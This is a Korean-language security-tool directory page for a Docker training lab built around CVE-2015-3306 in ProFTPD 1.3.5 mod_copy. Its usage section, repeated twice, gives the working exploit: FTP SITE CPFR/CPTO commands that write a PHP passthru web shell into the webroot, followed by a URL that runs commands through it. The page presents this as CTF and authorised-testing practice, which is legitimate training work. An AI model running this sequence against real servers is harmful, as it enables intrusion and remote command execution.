Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 - ProFTPD - 레드팀 또는 모의 침투 테스트에 사용하기 쉬운 RCE 홈랩 구성(Docker) | Kitploit
도구/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationRed TeamingLabs & Practice
GitHubnetw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 - ProFTPD - 레드팀 또는 모의 침투 테스트에 사용하기 쉬운 RCE 홈랩 구성(Docker)

저장소 보기
9개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

ProFTPD 1.3.5 (mod_copy) — RCE 시뮬레이션 랩

CVE20153306

이 랩은 CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE 취약점을 시뮬레이션하도록 설계되었습니다.
ProFTPD의 mod_copy 모듈을 통한 웹 셸 삽입 RCE(Web Shell Injection RCE) 학습에 사용됩니다.


기능

  • 취약한(Vulnerable) ProFTPD 1.3.5
  • mod_copy 완전 활성화 (SITE CPFR / SITE CPTO)
  • 익명 FTP(Anonymous FTP) 지원
  • 웹 루트 /var/www/html 시뮬레이션을 위한 Apache2 + PHP5
  • 공격자는 SITE CPFR/CPTO를 사용하여 RCE를 트리거하기 위해 webroot로 파일을 복사할 수 있음
  • 컨테이너 시작 시마다 flag_RANDOM.txt 자동 생성
  • CTF / 레드 팀 / 침투 테스트 교육용 랩

디렉터리 구조

root@kitploit:~
/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh

사용 방법(컨테이너 실행)

root@kitploit:~
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab

CVE-2015-3306 취약점 테스트 방법

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

웹 브라우저로 열기:

root@kitploit:~
http://<IP>/webshell.php?cmd=<command>

플래그

저장 위치:

root@kitploit:~
/tmp/flag_RANDOM.txt

영어 버전 — ProFTPD 1.3.5 (mod_copy) RCE 랩

이 랩은 mod_copy가 활성화된 ProFTPD 1.3.5를 사용하여 CVE-2015-3306을 시뮬레이션하며, 공격자가 **ProFTPD mod_copy 원격 파일 복사 후 RCE(Remote File Copy to RCE)**를 수행할 수 있게 합니다.


기능

  • 소스에서 컴파일된 취약한 ProFTPD 1.3.5
  • mod_copy 활성화 (SITE CPFR + SITE CPTO)
  • 익명 FTP 접근
  • 웹 셸 실행을 위한 Apache2 + PHP5
  • 컨테이너 시작 시 자동 생성되는 flag_RANDOM.txt
  • CTF, 교육, 익스플로잇 연구에 적합

익스플로잇 테스트 예제

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

그런 다음 실행:

root@kitploit:~
http://<IP>/webshell.php?cmd=<command>

플래그 위치

root@kitploit:~
/tmp/flag_RANDOM.txt

면책 조항

교육 및 승인된 침투 테스트 전용입니다.

도구 다운로드